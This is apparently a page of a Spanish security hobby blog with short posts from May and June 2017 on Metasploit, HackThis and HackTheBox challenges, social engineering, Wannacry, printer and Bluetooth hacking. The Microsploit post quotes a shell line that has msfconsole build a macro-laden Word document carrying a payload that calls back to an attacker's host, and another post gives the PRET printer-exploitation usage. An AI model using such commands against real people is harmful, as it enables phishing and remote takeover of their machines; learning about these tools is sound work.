Ejemplo de como funciona PDO:

 

Es una idea loca y fácil, pero me ha molado hacerla. Aquí tenéis el enlace a mi GitHub para que podáis jugar con los scripts:

Sed Buenos ;)

jueves, 8 de junio de 2017

StateX.-Las gracias a quien hay de dárselas

Siempre empiezo mis entradas con una mención al día con termino como por ejemplo: Hoy, ayer, es Viernes ... y la verdad es que me gusta. Bueno, mas bien ya me he acostumbrado a ella y creo que se adecuan bien a mi manera de escribir en este blog.  Vamos, que improviso un montón.


Esta entrada está un poco mas preparada que las demás ya que en esta semana y estamos a jueves, han pasado unas cuantas cosas de las que os tengo que estar agradecido  a vosotros, mis lectores.

Vamos por puntos:
  1. Gracias a todos los que aportáis valor a este blog con vuestros comentarios, entradas, noticias, imágenes e ideas. (Ya sabéis todos quien sois)
  2. Gracias a los que apoyáis a Tonto ... No me esperaba que a la gente le gustara  tanto y que ahora estén aportando ideas en el [foro]. 
  3. Gracias a todos los que me corregís. La verdad, jode pero se aprende mas y aveces pasa cosas muy chulas. Por ejemplo ayer el bueno de Snifer me corrigió con el tema de para que servia RHost y LHost de metasploit y al final acabamos haciéndole una pregunta al creador de la entrada que recomendaba. Así aprendimos. 
Y ya está, en esta semana me habéis ayudado mas que en años y eso es de agradecer. Este blog se creó con la necesidad de aprender muchas cosas sobre este mundo. Hasta hemos pasado por bastantes estados: Un síndrome de  Diógenes digital al acumular documentos, frustración por no poder leerlas todas, aprobamos el CEH y como no por momentos de euforia y de días malos.

Nunca he tenido mas reputación de la que me habéis dado vosotros y espero que sigáis así aportando, ayudando y corrigiendo. Os lo agradeceré siempre y me gustaría, quizás, en un futuro, deje de llamaros lectores y pueda llamaros comunidad.

Sed Buenos ;)

miércoles, 7 de junio de 2017

Metasploit.- Paso a paso.

Hace mucho que no toco Metasploit, miento el otro día lo abrí para ver si estaba el mítico exploit de samba pero no mucho mas, pero con la que está cayendo últimamente no solo tendría que empezar a refrescar Ruby si no también Metasploit. 


Por eso y ya que voy a refrescarlo esta tarde, os dejo con la guía Step by step Metasploit del blog zero-day.io donde no solo hacen una repaso al famoso framework si no que ademas te explican la fase de reconocimiento con un par de herramientas famosas también y se para a explicar por que debemos utilizar Rhost cuando estamos lanzando un exploit desde fuera de nuestra red y Lhost cuando la maquina victima esta dentro. Muy recomendable. 

Enlace a la guía: 
Sed Buenos ;) 

martes, 6 de junio de 2017

Antivmdetection.- Analiza Malware tranquilamente.

Hemos hablado mucho sobre [que tipo de información buscaba un Malware] para descubrir si está corriendo en una máquina virtual y de esta manera cambiar su manera de actuar para que no podamos descubrir que hace. Por eso, Mikael Keri ha creado un script para preparar nuestro Windows para que podamos analizar el bicho tranquilamente sin que mute a un proceso inocuo.


Muchas mas información y enlace al GitHub:

Aprovechadlo antes de que los malos modifiquen sus códigos para saltarse esto también. 

Sed Buenos ;) 

domingo, 4 de junio de 2017

HackThis Javascript 5.- Devuélveme la pass 2 la venganza

Domingo, vídeo y manta ya que por aquí llueve un poco y se está la mar de a gusto. Bueno, otro error típico en Javascript,  esta vez estaba un poco mas escondido pero en linea con el Javascript 3 Kazukun consigue obtener la pass de este reto mediante la invocación del comando alert().

Esperemos que os guste: 


Sed Buenos ;) 

viernes, 2 de junio de 2017

Vídeo.- Bienvenidos a Hackerville

Esto ha sido un rumor en mi casa desde que empezamos a trastear en el mundo de las seguridad informática, un pueblo lleno de hackers haciendo barrabasadas todo el día nos parecía super guay  ... no sabíamos nada pero la curiosidad de lo que se hace en este pueblo de Rumanía siempre me ha intrigado.  

Así que hoy os recomiendo este vídeo que han compartido en el grupo de Facebook de Hackstory para que como yo hace unos años descubráis que no es tan guay, ni chulo como parece. 


Sed Buenos ;)

jueves, 1 de junio de 2017

Infografía.- Vectores de ataque de la Ingeniería Social

Hace un par de días que los he dedicado a algo muy parecido a la ingeniería social y quieras o no, si trabajas en este mundo, no puedes evitar extrapolarlo para hacer el mal. Por eso ayer os compartí el vídeo de Google y hoy os vamos a ver los diferentes vectores de ataque que tiene la ingeniería social para que nada pueda sorprendernos. 


Más información y fuente:

Sed Buenos ;)

miércoles, 31 de mayo de 2017

Vídeo.- Google: Cómo evitar ataques de ingeniería social

Ya sabéis. que al final por mucho que aseguremos nuestras máquinas el mejor antivirus somos nosotros mismo. Por eso debemos estar formado y atentos a cualquier tontería que veamos o detectemos como sospechosa.

Google lo sabe y por eso ha publicado algunas claves para concienciarnos de las amenazas y ver como tenemos que reaccionar para solucionarlas.


Sed Buenos ;) 

martes, 30 de mayo de 2017

Proyecto.- Pray for tonto

Para los nuevos que leéis este blog Tonto es un asistente virtual que empecé a programar para aprender Python y que poco a poco ha ido tomando forma. Pero ya hace meses que no he escrito ni una linea de su código justo cuando cree el foro Pray for Tonto para que la gente que me enviaba recomendaciones y pedía consejo se pudieran responder los unos a los otros y de esta manera jugar con la tecnología, que es lo que nos gusta al fin y al cabo. 

Pero al ver que casi nadie aportaba, al final, me olvide de ella hasta que recibí en mi inbox, el siguiente mensaje: 


Además de tocarme muy fuerte la "patata", habían varias ideas chulas en los hilos, así que creo que la poca colaboración que ha habido se debe a que no he movido el tema ya que la gente quiere colaborar. 


De esta manera ahora tendremos el siguiente muñeco a la derecha del blog por si queréis colaborar y yo me comprometo a aportar mas valía a este foro. 

Enlaces para que los que no sepáis que es Tonto:

 Sed Buenos ;) 

lunes, 29 de mayo de 2017

PRET.- No mires la basura mira a tu impresora.

Por si no lo sabéis en muchas empresas la basura se trata de una manera diferente a lo que estamos acostumbrados nosotros en casa. Esto es debido a que se trata con información sensible o de importancia y no queremos que un tipo, rebuscando en la basura, obtenga dicha información.  A esto se le llama dumpester diving, pero lo que ahora está de moda es escarbar en tu impresora. 


PRET es una herramienta que nos permite descubrir las impresoras conectadas a nuestra red y explotarlas para que nos devuelva y además el usage es simple. ¿Qué mas podemos pedir?

  • usage: pret.py [opcion] target {ps,pjl,pcl}

Mucha mas información y link al repositorio de la herramienta: 
Sed Buenos ;) 

domingo, 28 de mayo de 2017

Vídeo.- Una invitación para HackTheBox

Hoy es domingo y toca vídeo. Pero quiero pararme un poco a explicaros que es HackTheBox y por que mola el capítulo de hoy.

HackTheBox es una pagina dedicada a probar técnicas relacionadas con pentesting e intercambiar ideas con la gente de su comunidad. Pero lo que mas me gusta es que has de hackear la página para encontrar la Key de invitación que te permita registrarte en ella. 

Os pego el enlace aquí abajo y si realmente queréis intentarlo no os miréis el vídeo hasta que no os sea necesario: 
Hace mucho nos dijeron que esto de ver el código fuente de una página no servia para nada. No dejan de tener parte de razón pero no deja de ser una de las principales técnicas que tiene un Hacker para trastear con páginas web.

En este caso Kazukun nos muestra como loguearnos en la pagina de "retos" Hack The Box la cual has de hackear para poder obtener una invitación.

Esperamos que os guste:



Sed Buenos ;)  

viernes, 26 de mayo de 2017

Vídeo.- Raspberry + TOR

Creo que este "artefacto" es uno de los primeros que debería tener alguien que le mole cacharrera con la seguridad informática. Es fácil de montar si no se te va mucho la cabeza probando cosas, es útil y aprendes un montón sobre configuraciones de linux y de tor. 

Además en este vídeo lo explican genial y hay un tío vestido de cura, que mas podemos pedir. 



Sed Buenos ;) 

jueves, 25 de mayo de 2017

Infografia.- Como funciona Wannacry paso por paso

Como buen curioso de este mundo, saber como actuaba el Ransomware de moda en las últimas semanas ha sido mi perdición así que si tenis la misma curiosidad que yo os va encantar esta infografia donde se muestra paso por paso como funciona este malware. Con pelos, señales y hasta el boletín que tendríais que tener instalado. 


Sed Buenos ;)

miércoles, 24 de mayo de 2017

Microsploit.- Trasteando con Office y Metasploit.

La verdad es que no se muy bien como calificar a este script pero la verdad es que es una buena herramienta si quieres trastear con documentos Office maliciosos. No se si os pasará a vosotros pero metasploit se me hace un poco pesado a la hora de trabajar con el, sobretodo si no tienes muy claro que exploit en concreto estas buscando por eso Microsploit mola. Gracias al menú podemos seleccionar que tipo de bicho queremos y el script por si solo interectua con metasploit y nos genera  el documento con macros en la carpeta output.


Ejemplo de como actúa el script con metasploit: 

"$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set target 1; exploit; exit -y'" 
echo "" 
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm

 Recomendable, pero siempre sabiendo lo que se está haciendo (aquí se ha hablado mucho sobre word con macros) y se necesitarán unas nociones básicas de metasploit.

Enlace al GitHub:



Sed Buenos ;)

martes, 23 de mayo de 2017

Aprendiendo Bluetooth Hacker MODE :ON

Ayer en el metro, mientras escuchaba música, me puse a mirar a toda la gente que estaba embobada mirando su smartphone y pensé en cuantos de ellos tendrían el Bluetooth activado por defecto y en lo que podría hacer si supiera tanto como [Pablo F. Iglesias] pero como aun no, por algun lado tendré que empezar. 


Así que, cual ha sido me sorpresa al encontrarme con el Git Hub de [Brando Asuncion] donde le ha hecho ingeniería inversa al protocolo de la manera mas Hacker que se me ocurre. Brando se ha creado un script que emula ser un radar de dispositivos bluetooth, ha escuchado la salida con Wireshark y después ha recopilado toda la información sobre la petición y la respuesta en su repositorio.

Muy recomendable y bien explicado, ademas tenéis los script que ha usado para reproducir el experimento: 



Sed Buenos ;) 


lunes, 22 de mayo de 2017

MS17-010 Usado para minear Monero

Si os pensabais que a nadie mas se le había ocurrido usar Eternal Blue ibais muy equivocados. Proofpoint analizando WannaCry descubrieron una clase de Malware (llamado Adylkuzz) que usaba EternalBlue y DoublePulsar para instalar de manera masiva un minero de la criptomoneda Monero. Se calcula que ha tenido un alcance parecido al famoso Ransomware pero, como no da un mensaje de alerta pues no ha saltado a la luz pública.


Hoy os recomiendo el post de proofpoint donde explican como lo descubrieron y como lo destriparon. No os voy a explicar mucho mas ya que espero que os lo leáis.  Merece la pena: 

domingo, 21 de mayo de 2017

HackThis Javascript 3.- Devuelveme la pass

Domingo y hoy toca ver la solución al tercer reto de Javascript en HackThis. Javascript mola mil pero siempre y cuando hagamos las cosas bien. así que no dejemos las pass harcodeadas en el código ya que es muy fácil llamar con un alert() a la variable en la que está metida la pass. De esta manera Kazukun nos muestra como solucionar el tercer reto de Javascript en HackThis.

Sed Buenos ;)

viernes, 19 de mayo de 2017

Vídeo - La Brecha Digital - Cifra tu mundo

Viernes y hoy toca vídeo para desgrasar de tanta actualizad y de tanto Wannacry pero que nos permita estar alerta y de como reaccionar para blindarnos en la red de red. 
Tor, VPN, VoIP segura, Seguridad WiFi, Cifrado de Archivos para almacenar en la nube, uso de una raspberry pi para limpiar el unidades USB sospechosas, sistema operativo seguro Qubes OS y más.

Espero que os guste y que os sirva como a mi para interesaros un poco mas en este mundo.



Sed Buenos ;)